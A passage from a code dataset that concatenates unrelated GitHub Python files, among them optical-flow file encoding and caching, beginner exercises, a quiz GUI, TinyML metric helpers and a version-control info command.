['.flowou2', '.png']\n\n def decode(xs, lb, ub):\n xs_01 = np.float32(xs) / (2**16 - 1)\n return lb + xs_01 * (ub - lb)\n\n pil_data = Image.open(str(path))\n metadata = pil_data.text\n data = np.asarray(pil_data)\n data = einops.rearrange(data, 'H W C -> C H W', C=4)\n flow, occlusions, uncertainty = data[:2, :, :], data[2, :, :], data[3, :, :]\n occlusions = einops.rearrange(occlusions, 'H W -> 1 H W')\n uncertainty = einops.rearrange(uncertainty, 'H W -> 1 H W')\n flow = decode(flow, float(metadata['flow_min']), float(metadata['flow_max']))\n occlusions = decode(occlusions, float(metadata['occl_min']), float(metadata['occl_max']))\n uncertainty = decode(uncertainty, float(metadata['unc_min']), float(metadata['unc_max']))\n return flow, occlusions, uncertainty\n\n\ndef write_flowou_X32(path, flow, occlusions, uncertainty):\n def compress_channel(xs):\n f_xs = np.float32(xs)\n lb = np.amin(f_xs)\n ub = np.amax(f_xs)\n\n if np.abs(ub - lb) < 1e-8:\n xs_01 = np.zeros_like(f_xs)\n else:\n xs_01 = (f_xs - lb) / (ub - lb)\n uint32_xs = np.uint32(xs_01 * (2**32 - 1))\n return uint32_xs, lb, ub\n\n def u32_to_4u8(xs):\n assert len(xs.shape) == 2, f\"Need a HxW array, got {xs.shape} instead\"\n byte_1 = np.uint8(xs & 0x000000FF)\n byte_2 = np.uint8((xs & 0x0000FF00) >> 8)\n byte_3 = np.uint8((xs & 0x00FF0000) >> 16)\n byte_4 = np.uint8((xs & 0xFF000000) >> 24)\n return np.dstack((byte_4, byte_3, byte_2, byte_1))\n\n def encode_channel(xs):\n compressed_xs, lb, ub = compress_channel(xs)\n xs_4u8 = u32_to_4u8(compressed_xs)\n is_success, buf = cv2.imencode(\".png\", xs_4u8)\n # https://stackoverflow.com/a/52865864/1705970\n return {'data': buf,\n 'min': lb,\n 'max': ub}\n\n result = {\n 'flow_x': encode_channel(flow[0, :, :]),\n 'flow_y': encode_channel(flow[1, :, :]),\n 'occlusion': encode_channel(occlusions[0, :, :]),\n 'sigma': encode_channel(uncertainty[0, :, :])\n }\n\n with open(path, 'wb') as fout:\n pickle.dump(result, fout)\n\n\ndef read_flowou_X32(path):\n def decode_channel(data):\n buf = data['data']\n # https://stackoverflow.com/a/52865864/1705970\n xs_4u8 = cv2.imdecode(buf, cv2.IMREAD_UNCHANGED)\n xs_compressed = data_4u8_to_u32(xs_4u8)\n xs = decompress_channel(xs_compressed, data['min'], data['max'])\n return xs\n\n def data_4u8_to_u32(xs):\n assert xs.dtype == np.uint8\n byte_4, byte_3, byte_2, byte_1 = np.dsplit(np.uint32(xs), 4)\n\n u32 = (byte_4 << 24) | (byte_3 << 16) | (byte_2 << 8) | byte_1\n return einops.rearrange(u32, 'H W 1 -> H W')\n\n def decompress_channel(compressed_xs, lb, ub):\n xs_01 = np.float32(compressed_xs) / (2**32 - 1)\n xs = (xs_01 * (ub - lb)) + lb\n return xs\n\n with open(path, 'rb') as fin:\n data = pickle.load(fin)\n\n flow_x = decode_channel(data['flow_x'])\n flow_y = decode_channel(data['flow_y'])\n flow = np.stack((flow_x, flow_y), axis=0)\n uncertainty = einops.rearrange(decode_channel(data['sigma']), 'H W -> 1 H W')\n occlusions = einops.rearrange(decode_channel(data['occlusion']), 'H W -> 1 H W')\n\n return flow, occlusions, uncertainty\n\n\ndef write_flowou_stepan16(path, flow, occlusions, uncertainty):\n def compress_channel(xs):\n f_xs = np.float32(xs)\n lb = np.amin(f_xs)\n ub = np.amax(f_xs)\n\n if np.abs(ub - lb) < 1e-8:\n xs_01 = np.zeros_like(f_xs)\n else:\n xs_01 = (f_xs - lb) / (ub - lb)\n uint16_xs = np.uint16(np.round(xs_01 * (2**16 - 1)))\n return uint16_xs, lb, ub\n\n def u16_to_3u8(xs):\n assert len(xs.shape) == 2, f\"Need a HxW array, got {xs.shape} instead\"\n byte_1 = np.uint8(xs & 0x00FF)\n byte_2 = np.uint8((xs & 0xFF00) >> 8)\n byte_3 = np.uint8((xs & 0x0000) >> 16)\n return np.dstack((byte_3, byte_2, byte_1))\n\n def encode_channel(xs):\n compressed_xs, lb, ub = compress_channel(xs)\n xs_3u8 = u16_to_3u8(compressed_xs)\n is_success, buf = cv2.imencode(\".png\", xs_3u8)\n return {'data': buf,\n 'min': lb,\n 'max': ub}\n\n result = {\n 'flow_x': encode_channel(flow[0, :, :]),\n 'flow_y': encode_channel(flow[1, :, :]),\n 'occlusion': encode_channel(occlusions[0, :, :]),\n 'sigma': encode_channel(uncertainty[0, :, :])\n }\n\n path = str(path)\n suffix = '.stepan16'\n assert path.endswith(suffix)\n path = path[:-len(suffix)]\n\n flow_x_path = path + '_flow_x.png'\n flow_y_path = path + '_flow_y.png'\n cv2.imwrite(flow_x_path, result['flow_x']['data'])\n cv2.imwrite(flow_y_path, result['flow_y']['data'])\n limits_path = path + '_limits.txt'\n with open(limits_path, 'w') as fout:\n fout.write(f\"{result['flow_x']['min']} {result['flow_x']['max']} {result['flow_y']['min']} {result['flow_y']['max']}\")\n\n\ndef write_flowou_X16(path, flow, occlusions, uncertainty):\n def compress_channel(xs):\n f_xs = np.float32(xs)\n lb = np.amin(f_xs)\n ub = np.amax(f_xs)\n\n if np.abs(ub - lb) < 1e-8:\n xs_01 = np.zeros_like(f_xs)\n else:\n xs_01 = (f_xs - lb) / (ub - lb)\n uint16_xs = np.uint16(np.round(xs_01 * (2**16 - 1)))\n return uint16_xs, lb, ub\n\n def u16_to_3u8(xs):\n assert len(xs.shape) == 2, f\"Need a HxW array, got {xs.shape} instead\"\n byte_1 = np.uint8(xs & 0x00FF)\n byte_2 = np.uint8((xs & 0xFF00) >> 8)\n byte_3 = np.uint8((xs & 0x0000) >> 16)\n return np.dstack((byte_3, byte_2, byte_1))\n\n def encode_channel(xs):\n compressed_xs, lb, ub = compress_channel(xs)\n xs_3u8 = u16_to_3u8(compressed_xs)\n is_success, buf = cv2.imencode(\".png\", xs_3u8)\n return {'data': buf,\n 'min': lb,\n 'max': ub}\n\n result = {\n 'flow_x': encode_channel(flow[0, :, :]),\n 'flow_y': encode_channel(flow[1, :, :]),\n 'occlusion': encode_channel(occlusions[0, :, :]),\n 'sigma': encode_channel(uncertainty[0, :, :])\n }\n\n with open(path, 'wb') as fout:\n pickle.dump(result, fout)\n\n\ndef read_flowou_X16(path):\n def decode_channel(data):\n buf = data['data']\n xs_3u8 = cv2.imdecode(buf, cv2.IMREAD_UNCHANGED)\n xs_compressed = data_3u8_to_u16(xs_3u8)\n xs = decompress_channel(xs_compressed, data['min'], data['max'])\n return xs\n\n def data_3u8_to_u16(xs):\n assert xs.dtype == np.uint8\n byte_3, byte_2, byte_1 = np.dsplit(np.uint16(xs), 3)\n\n u16 = (byte_2 << 8) | byte_1\n return einops.rearrange(u16, 'H W 1 -> H W')\n\n def decompress_channel(compressed_xs, lb, ub):\n xs_01 = np.float32(compressed_xs) / (2**16 - 1)\n xs = (xs_01 * (ub - lb)) + lb\n return xs\n\n with open(path, 'rb') as fin:\n data = pickle.load(fin)\n\n flow_x = decode_channel(data['flow_x'])\n flow_y = decode_channel(data['flow_y'])\n flow = np.stack((flow_x, flow_y), axis=0)\n uncertainty = einops.rearrange(decode_channel(data['sigma']), 'H W -> 1 H W')\n occlusions = einops.rearrange(decode_channel(data['occlusion']), 'H W -> 1 H W')\n\n return flow, occlusions, uncertainty\n\n\nclass GeneralVideoCapture(object):\n \"\"\"A cv2.VideoCapture replacement, that can also read images in a directory\"\"\"\n\n def __init__(self, path, reverse=False):\n images = Path(path).is_dir()\n self.image_inputs = images\n if images:\n self.path = path\n self.images = sorted([f for f in next(os.walk(path))[2]\n if os.path.splitext(f)[1].lower() in ['.jpg', '.png', '.jpeg']])\n if reverse:\n self.images = self.images[::-1]\n self.i = 0\n else:\n self.cap = cv2.VideoCapture(str(path))\n\n def read(self):\n if self.image_inputs:\n if self.i >= len(self.images):\n return False, None\n img_path = os.path.join(self.path,\n self.images[self.i])\n self.frame_src = self.images[self.i]\n img = cv2.imread(img_path)\n self.i += 1\n return True, img\n else:\n return self.cap.read()\n\n def release(self):\n if self.image_inputs:\n return None\n else:\n return self.cap.release()\n\n\ndef get_video_frames(path):\n cap = GeneralVideoCapture(path)\n while True:\n success, frame = cap.read()\n if not success or frame is None:\n return None\n yield frame\n\n\ndef get_video_length(path):\n N = 0\n for frame in get_video_frames(path):\n N += 1\n return N\n\n\nclass FlowCache():\n def __init__(self, cache_dir, max_RAM_MB=10000, max_GPU_RAM_MB=5000):\n self.cache_dir = cache_dir\n self.max_RAM_MB = max_RAM_MB\n self.max_GPU_RAM_MB = max_GPU_RAM_MB\n self.ram_cache = {}\n self.gpu_ram_cache = {}\n self.bytes_used = 0\n self.gpu_ram_bytes_used = 0\n self.n_saved = 0\n self.cache_dir.mkdir(parents=True, exist_ok=True)\n\n def _put(self, key, value):\n for tensor in value:\n self.bytes_used += sys.getsizeof(tensor.storage())\n self.ram_cache[key] = value\n\n def _put_gpu_ram(self, key, value):\n for tensor in value:\n self.gpu_ram_bytes_used += sys.getsizeof(tensor.storage())\n self.gpu_ram_cache[key] = value\n\n def _get(self, key):\n return self.ram_cache[key]\n\n def _get_gpu_ram(self, key):\n return self.gpu_ram_cache[key]\n\n def ram_space_left(self):\n max_bytes = self.max_RAM_MB * 1000000\n return max(max_bytes - self.bytes_used, 0)\n\n def gpu_ram_space_left(self):\n max_bytes = self.max_GPU_RAM_MB * 1000000\n return max(max_bytes - self.gpu_ram_bytes_used, 0)\n\n # @profile\n def read(self, left_id, right_id):\n key = (left_id, right_id)\n flow_left_to_right, occlusions, sigmas = None, None, None\n if key in self.gpu_ram_cache:\n flow_left_to_right, occlusions, sigmas = self._get_gpu_ram(key)\n elif key in self.ram_cache:\n flow_left_to_right, occlusions, sigmas = self._get(key)\n flow_left_to_right = flow_left_to_right.to('cuda')\n occlusions = occlusions.to('cuda')\n sigmas = sigmas.to('cuda')\n else:\n try:\n cache_path = self.cache_dir / f'{left_id}--{right_id}.flowouX16.pkl'\n assert cache_path.exists()\n flow_left_to_right, occlusions, sigmas = read_flowou(cache_path)\n flow_left_to_right = torch.from_numpy(flow_left_to_right).to('cuda')\n occlusions = torch.from_numpy(occlusions).to('cuda')\n sigmas = torch.from_numpy(sigmas).to('cuda')\n # when reading from disk, try to cache to GPU / RAM\n self.write(left_id, right_id, flow_left_to_right, occlusions, sigmas) \n except Exception:\n pass\n\n return flow_left_to_right, occlusions, sigmas\n\n # @profile\n def write(self, left_id, right_id, flow_left_to_right, occlusions, sigmas):\n if self.gpu_ram_space_left() > 0:\n key = (left_id, right_id)\n self._put_gpu_ram(key, (flow_left_to_right, occlusions, sigmas))\n elif self.ram_space_left() > 0:\n key = (left_id, right_id)\n self._put(key, (flow_left_to_right.cpu(),\n occlusions.cpu(),\n sigmas.cpu()))\n else:\n self.cache_dir.mkdir(parents=True, exist_ok=True)\n cache_path = self.cache_dir / f'{left_id}--{right_id}.flowouX16.pkl'\n if not cache_path.exists():\n write_flowou(cache_path,\n ensure_numpy(flow_left_to_right),\n ensure_numpy(occlusions),\n ensure_numpy(sigmas))\n self.n_saved += 1\n\n def clear(self, clear_disk=True):\n logger.debug(f'Saved {self.n_saved} flows, '\n f'{len(self.gpu_ram_cache)} on GPU ({self.gpu_ram_bytes_used / 2**30:.2f}GiB), '\n f'{len(self.ram_cache)} on RAM ({self.bytes_used / 2**30:.2f}GiB)')\n c = Counter()\n for left_id, right_id in self.ram_cache.keys():\n delta = abs(left_id - right_id)\n c[delta] += 1\n logger.debug(f'delta frequency: {c}')\n\n self.gpu_ram_cache.clear()\n self.gpu_ram_bytes_used = 0\n self.ram_cache.clear()\n self.bytes_used = 0\n self.n_saved = 0\n\n if clear_disk:\n shutil.rmtree(self.cache_dir, ignore_errors=True)\n\n def backup_to_disk(self):\n \"\"\"Save all the cached flowous to disk\"\"\"\n n_saved = 0\n for (left_id, right_id), val in tqdm.tqdm(list(self.ram_cache.items()), desc='saving RAM cache'):\n cache_path = self.cache_dir / f'{left_id}--{right_id}.flowouX16.pkl'\n if not cache_path.exists():\n write_flowou(cache_path, *[ensure_numpy(x) for x in val])\n n_saved += 1\n\n for (left_id, right_id), val in tqdm.tqdm(list(self.gpu_ram_cache.items()), desc='saving GPU cache'):\n cache_path = self.cache_dir / f'{left_id}--{right_id}.flowouX16.pkl'\n if not cache_path.exists():\n write_flowou(cache_path, *[ensure_numpy(x) for x in val])\n n_saved += 1\n logger.info(f\"Saved {n_saved} cached flowous to disk.\")\n\n def load_from_disk(self):\n all_cached = sorted(list(self.cache_dir.glob('*.flowouX16.pkl')))\n n_loaded = 0\n for path in tqdm.tqdm(all_cached, desc=\"loading flowous from disk\"):\n left_id, right_id = Path(path.stem).stem.split('--')\n left_id, right_id = int(left_id), int(right_id)\n\n try:\n flow_left_to_right, occlusions, sigmas = read_flowou(path)\n flow_left_to_right = torch.from_numpy(flow_left_to_right).to('cuda')\n occlusions = torch.from_numpy(occlusions).to('cuda')\n sigmas = torch.from_numpy(sigmas).to('cuda')\n self.write(left_id, right_id, flow_left_to_right, occlusions, sigmas)\n n_loaded += 1\n except Exception:\n pass\n logger.info(f\"Loaded {n_loaded} flowous into cache.\")\n","repo_name":"serycjon/MFT","sub_path":"MFT/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":27014,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"32326185184","text":"import sys\nsys.stdin = open(\"sample_input.txt\")\n\nT = int(input())\n\nfor tc in range(1,T+1):\n L = list(input())\n cnt = 0\n stick = 0\n for i in range(0,len(L)):\n if L[i] == '(' and L[i+1] == ')':\n cnt += stick\n i += 2\n elif L[i] == '(' :\n stick += 1\n else :\n stick -= 1\n\n print(tc,cnt)","repo_name":"estar1996/TIL","sub_path":"algo/과목평가 대비/레이저/레이저.py","file_name":"레이저.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7896288511","text":"# this is a simple function that will print what is in the '', the string\nprint('I am Lewis Cleveland')\n\n# this is a print funtion to print a simple dog\nprint('o----')\nprint(' ||||')\n\n# the below will print a * 10 times\nprint('*' * 10)\n\n# this is an example of a variable, price is the tag, 10 is an integer associated with the tag/variable\nprice = 10\n# I can then change the price to 20, Python will read from top to bottom so will print the last price listed\nprice = 20\nprint(price)\n# this is a float or decimal\nrating = 4.9\n# this is another string\nname = 'Lewis'\n# this is a boolean, they can either be True or False, the capital letters are important\nis_published = True\n\n# task: write variables for a patient called John Smith, hes 20 and is a new patient\nfullname = 'John Smith'\nage = 20\nnew_patient = True\n# this is a input function for the user to answer\nname = input('What is your name? ')\n# this is an example of concatenation\nprint('Hi ' + name)\n\n# task: ask 2 questions, persons name and favourite colour. then print the output\nname = input('What is your name? ')\ncolour = input('Whats your favourite colour? ')\nprint(name + ' likes ' + colour)\n\n# when we want to use the maths, you cannot take an int from a str, the string needs to be changed to an integer, or int\nbirth_year = input('What is your birth year? ')\nage = 2023 - int(birth_year)\nprint(age)\n# you can use the type function by typing (type)\nprint(type(age))\n\n# challenge: gather a weight input, then to convert into pounds, so using the input, converting into int then times by 2.2\nweight = input('What is your weight in kg? ')\npounds = int(weight) * 2.2\nprint(pounds)\n\n","repo_name":"Arctic22Fox/Homework","sub_path":"Python/mosh.py","file_name":"mosh.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25777143535","text":"#!/usr/bin/python3\n#coding=utf-8\n\n##############################################\n#\n# Author: Shen Wenrui\n# Date: 20180528\n# Description:\n#\n##############################################\n\nimport threading\nimport logging\n\nfrom .tempEmailListener import tempEmailListener\n\nlogger = logging.getLogger(\"tempEmail\")\n\nclass guerrillamailThread(threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n logger.info(\"开启线程: \" + self.name)\n logger.info(\"Start the Main process: applying temp email.\")\n\n guerrillamail = tempEmailListener()\n guerrillamail.guerrillamailBrowser()\n\n logger.info(\"结束线程: \" + self.name)\n logger.info(\"End the Main process.\")\n","repo_name":"WenruiShen/FreeAppleID","sub_path":"src/TempEmail/tempEmailThread.py","file_name":"tempEmailThread.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"14821846934","text":"import csv, torch, os\nimport numpy as np\n\ndef ACC(mylist):\n tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n total = sum(mylist)\n acc = (tp + tn) / total\n return acc\n\n\ndef PPV(mylist):\n tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n # for the case: there is no VA segs for the patient, then ppv should be 1\n if tp + fn == 0:\n ppv = 1\n # for the case: there is some VA segs, but the predictions are wrong\n elif tp + fp == 0 and tp + fn != 0:\n ppv = 0\n else:\n ppv = tp / (tp + fp)\n return ppv\n\n\ndef NPV(mylist):\n tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n # for the case: there is no non-VA segs for the patient, then npv should be 1\n if tn + fp == 0:\n npv = 1\n # for the case: there is some VA segs, but the predictions are wrong\n elif tn + fn == 0 and tn + fp != 0:\n npv = 0\n else:\n npv = tn / (tn + fn)\n return npv\n\n\ndef Sensitivity(mylist):\n tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n # for the case: there is no VA segs for the patient, then sen should be 1\n if tp + fn == 0:\n sensitivity = 1\n else:\n sensitivity = tp / (tp + fn)\n return sensitivity\n\n\ndef Specificity(mylist):\n tp, fn, fp, tn = mylist[0], mylist[1], mylist[2], mylist[3]\n # for the case: there is no non-VA segs for the patient, then spe should be 1\n if tn + fp == 0:\n specificity = 1\n else:\n specificity = tn / (tn + fp)\n return specificity\n\n\ndef BAC(mylist):\n sensitivity = Sensitivity(mylist)\n specificity = Specificity(mylist)\n b_acc = (sensitivity + specificity) / 2\n return b_acc\n\n\ndef F1(mylist):\n precision = PPV(mylist)\n recall = Sensitivity(mylist)\n if precision + recall == 0:\n f1 = 0\n else:\n f1 = 2 * (precision * recall) / (precision + recall)\n return f1\n\n\ndef FB(mylist, beta=2):\n precision = PPV(mylist)\n recall = Sensitivity(mylist)\n if precision + recall == 0:\n f1 = 0\n else:\n f1 = (1+beta**2) * (precision * recall) / ((beta**2)*precision + recall)\n return f1\n\ndef stats_report(mylist):\n f1 = round(F1(mylist), 5)\n fb = round(FB(mylist), 5)\n se = round(Sensitivity(mylist), 5)\n sp = round(Specificity(mylist), 5)\n bac = round(BAC(mylist), 5)\n acc = round(ACC(mylist), 5)\n ppv = round(PPV(mylist), 5)\n npv = round(NPV(mylist), 5)\n\n output = str(mylist) + '\\n' + \\\n \"F-1 = \" + str(f1) + '\\n' + \\\n \"F-B = \" + str(fb) + '\\n' + \\\n \"SEN = \" + str(se) + '\\n' + \\\n \"SPE = \" + str(sp) + '\\n' + \\\n \"BAC = \" + str(bac) + '\\n' + \\\n \"ACC = \" + str(acc) + '\\n' + \\\n \"PPV = \" + str(ppv) + '\\n' + \\\n \"NPV = \" + str(npv) + '\\n'\n\n print(\"F-1 = \", F1(mylist))\n print(\"F-B = \", FB(mylist))\n print(\"SEN = \", Sensitivity(mylist))\n print(\"SPE = \", Specificity(mylist))\n print(\"BAC = \", BAC(mylist))\n print(\"ACC = \", ACC(mylist))\n print(\"PPV = \", PPV(mylist))\n print(\"NPV = \", NPV(mylist))\n\n return output\n\ndef loadCSV(csvf):\n \"\"\"\n return a dict saving the information of csv\n :param splitFile: csv file name\n :return: {label:[file1, file2 ...]}\n \"\"\"\n dictLabels = {}\n with open(csvf) as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n next(csvreader, None) # skip (filename, label)\n for i, row in enumerate(csvreader):\n filename = row[0]\n label = row[1]\n\n # append filename to current label\n if label in dictLabels.keys():\n dictLabels[label].append(filename)\n else:\n dictLabels[label] = [filename]\n return dictLabels\n\n\ndef txt_to_numpy(filename, row):\n file = open(filename)\n lines = file.readlines()\n datamat = np.arange(row, dtype=np.float)\n row_count = 0\n for line in lines:\n line = line.strip().split(' ')\n datamat[row_count] = line[0]\n row_count += 1\n\n return datamat\n\n\nclass ToTensor(object):\n def __call__(self, sample):\n text = sample['IEGM_seg']\n return {\n 'IEGM_seg': torch.from_numpy(text),\n 'label': sample['label']\n }\n\n\nclass IEGM_DataSET():\n def __init__(self, root_dir, indice_dir, mode, size, transform=None):\n self.root_dir = root_dir\n self.indice_dir = indice_dir\n self.size = size\n self.names_list = []\n self.transform = transform\n\n csvdata_all = loadCSV(os.path.join(self.indice_dir, mode + '_indice.csv'))\n\n for i, (k, v) in enumerate(csvdata_all.items()):\n self.names_list.append(str(k) + ' ' + str(v[0]))\n\n def __len__(self):\n return len(self.names_list)\n\n def __getitem__(self, idx):\n text_path = self.root_dir + self.names_list[idx].split(' ')[0]\n\n if not os.path.isfile(text_path):\n print(text_path + 'does not exist')\n return None\n\n IEGM_seg = txt_to_numpy(text_path, self.size).reshape(1, self.size, 1)\n label = int(self.names_list[idx].split(' ')[1])\n sample = {'IEGM_seg': IEGM_seg, 'label': label}\n\n return sample\n\n\ndef pytorch2onnx(net_path, net_name, size):\n net = torch.load(net_path, map_location=torch.device('cpu'))\n\n dummy_input = torch.randn(1, 1, size, 1)\n\n optName = str(net_name)+'.onnx'\n torch.onnx.export(net, dummy_input, optName, verbose=True)\n","repo_name":"tinymlcontest/tinymlcontest2022_demo_example","sub_path":"help_code_demo.py","file_name":"help_code_demo.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"} +{"seq_id":"9191604307","text":"# 86829674\n\nfrom collections import Counter\nfrom typing import Tuple\n\nNUMBER_OF_ROWS = 4\nNUMBER_OF_PLAYERS = 2\n\n\ndef typing_trainer(k: int, digits: str) -> int:\n cnt = Counter(digits)\n new_cnt = [0 if value > k * NUMBER_OF_PLAYERS else 1 for value in cnt.values()]\n return sum(new_cnt)\n\n\ndef read_input() -> Tuple[int, str]:\n digits = []\n k = int(input())\n for i in range(4):\n digits.append(input())\n digits = \"\".join(digits)\n digits = \"\".join(c for c in digits if c.isdecimal())\n return (k, digits)\n\n\nif __name__ == '__main__':\n k, digits = read_input()\n result = typing_trainer(k, digits)\n print(result)\n","repo_name":"lerapraga/algorithms_11_sprint","sub_path":"typing_trainer.py","file_name":"typing_trainer.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30118981077","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional\n\nfrom dm.core.objects.status import DMStatus\nfrom utilities import *\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.objects.unit import DMUnit\n from dm.core.game.game import DMGame\n################################################################################\n\n__all__ = (\"Taunt\",)\n\n################################################################################\nclass Taunt(DMStatus):\n\n def __init__(\n self,\n game: DMGame,\n parent: Optional[DMUnit] = None,\n stacks: Optional[int] = 1\n ):\n\n super().__init__(\n game,\n parent,\n _id=\"BUF-129\",\n name=\"Taunt\",\n description=\"Become all enemies' target.\",\n stacks=stacks,\n status_type=StatusType.Buff\n )\n\n################################################################################\n def handle(self, ctx: AttackContext) -> None:\n \"\"\"Called in every iteration of the battle loop.\"\"\"\n\n if self.owner.room == ctx.room:\n # Force change the defending unit to the owner of this status.\n if self.owner != ctx.target:\n ctx.reassign_defender(self.owner)\n\n # Register callback to reduce stacks if damage is actually done\n ctx.register_post_execute(self.notify)\n\n################################################################################\n def notify(self, ctx: AttackContext) -> None:\n\n if self.owner == ctx.target:\n if ctx.damage > 0:\n self.reduce_stacks_by_one()\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/statuses/buffs/Taunt.py","file_name":"Taunt.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37407839968","text":"from collections import deque\n\nn, m = map(int, input().split())\narr = []\n\nfor i in range(n):\n arr.append(list(map(int, input())))\n\n# 상하좌우\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\n\ndef bfs(x, y):\n queue = deque()\n # 큐에 좌표값 할당\n queue.append((x, y))\n\n # 큐가 빌 때까지\n while queue:\n # 큐의 맨 아래에 있는 요소 꺼내기\n x, y = queue.popleft()\n\n # 상하좌우 탐색\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n # 미로를 벗어났을 경우\n if nx < 0 or ny < 0 or nx >= n or ny >= m:\n continue\n # 괴물이 존재하는 경우\n if arr[nx][ny] == 0:\n continue\n # 제대로 된 길인 경우\n if arr[nx][ny] == 1:\n # 다음으로 이동할 곳에 현재 값의 + 1을 하여 움직인 칸 수 저장하기\n arr[nx][ny] = arr[x][y] + 1\n # 큐에 다음 좌표 할당\n queue.append((nx, ny))\n # 종점의 값 반환\n return arr[n-1][m-1]\n\n\n# 시작 좌표 할당\nprint(bfs(0, 0))\n","repo_name":"pipi-shortstocking/CodingTest","sub_path":"DFS,BFS/미로 탈출/복습.py","file_name":"복습.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9509839371","text":"from quiz_brain import QuizBrain\nfrom tkinter import *\n\nTHEME_COLOR = \"#375362\"\n\n\nclass QuizInterface:\n def __init__(self, quiz_brain: QuizBrain):\n self.quiz = quiz_brain\n self.window = Tk()\n self.window.title(\"Quizler\")\n self.window.config(padx=20, pady=20, bg=THEME_COLOR)\n\n self.score = Label(text=\"Score: 0\", bg=THEME_COLOR, font=(\"Arial\", 14), fg=\"white\")\n self.score.grid(row=0, column=1)\n\n self.canvas = Canvas(width=300, height=250, bg=\"white\")\n self.main_text = self.canvas.create_text(150, 125, text=\"\", font=(\"Arial\", 20, \"italic\"), width=280)\n self.canvas.grid(row=1, column=0, columnspan=2, padx=20, pady=20)\n self.update_text()\n\n correct_img = PhotoImage(file=\"./images/true.png\")\n false_img = PhotoImage(file=\"./images/false.png\")\n self.correct_bt = Button(image=correct_img, highlightthickness=0, command=self.correct_handler)\n self.correct_bt.grid(row=2, column=1)\n self.false_bt = Button(image=false_img, highlightthickness=0, command=self.false_handler)\n self.false_bt.grid(row=2, column=0)\n\n self.window.mainloop()\n\n def answer_handler(self, answer):\n color = \"green\" if self.quiz.check_answer(answer) else \"red\"\n self.window.after(250, self.update_screen, color)\n\n def correct_handler(self):\n self.answer_handler(\"True\")\n\n def false_handler(self):\n self.answer_handler(\"False\")\n\n def update_text(self):\n self.canvas.config(bg=\"white\")\n self.score.config(text=f\"Score:{self.quiz.score}\")\n if self.quiz.question_number < 10:\n self.canvas.itemconfig(self.main_text, text=self.quiz.next_question())\n else:\n self.canvas.itemconfig(self.main_text,\n text=f\"Final Score: {self.quiz.score}/{self.quiz.question_number}\")\n self.correct_bt.config(state=\"disabled\")\n self.false_bt.config(state=\"disabled\")\n\n def update_screen(self, color):\n self.canvas.config(bg=color)\n self.window.after(500, self.update_text)\n","repo_name":"Robprogram2002/one_hundred_code_challenge_course","sub_path":"days_16_40_intermediate/Day34/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6830133840","text":"import cv2\nimport numpy as np\ndef getHomography(kpsA, kpsB, featuresA, featuresB, matches, reprojThresh):\n # convert the keypoints to numpy arrays\n kpsA = np.float32([kp.pt for kp in kpsA])\n kpsB = np.float32([kp.pt for kp in kpsB])\n \n if len(matches) >= 4:\n # construct the two sets of points\n ptsA = np.float32([kpsA[m.queryIdx] for m in matches]).reshape(-1,1,2)\n ptsB = np.float32([kpsB[m.trainIdx] for m in matches]).reshape(-1,1,2)\n \n # estimate the homography between the sets of points\n (H, status) = cv2.findHomography(ptsA, ptsB, cv2.RANSAC, reprojThresh)\n return (matches, H, status)\n else:\n print(\"Can't not match !\")\n return None","repo_name":"NgTuanLoc/PanoramaStitching","sub_path":"getHomography.py","file_name":"getHomography.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11344790426","text":"import json\nimport sys\n\nfrom .command import Command\nfrom datetime import datetime\nfrom webkitcorepy import arguments\nfrom webkitscmpy import Commit, local\n\n\nclass Info(Command):\n name = 'info'\n help = 'Print information about the HEAD commit'\n\n @classmethod\n def parser(cls, parser, loggers=None):\n parser.add_argument(\n '--json', '-j',\n help='Convert the commit to a machine-readable JSON object',\n action='store_true',\n dest='json',\n default=False,\n )\n parser.add_argument(\n '--log', '--no-log',\n help='Include the commit message for the requested commit',\n action=arguments.NoAction,\n dest='include_log',\n default=True,\n )\n\n @classmethod\n def print_(cls, args, commits, verbose_default=0):\n if args.json:\n print(json.dumps(commits if len(commits) > 1 else commits[0], cls=Commit.Encoder, indent=4))\n return 0\n\n if args.verbose < verbose_default:\n for commit in commits:\n print('{identifier} | {hash}{revision}{title}'.format(\n identifier=commit,\n hash=commit.hash[:Commit.HASH_LABEL_SIZE] if commit.hash else '',\n revision='{}r{}'.format(', ' if commit.hash else '', commit.revision) if commit.revision else '',\n title=' | {}'.format(commit.message.splitlines()[0]) if commit.message else ''\n ))\n return 0\n\n previous = False\n for commit in commits:\n if previous:\n print('-' * 20)\n previous 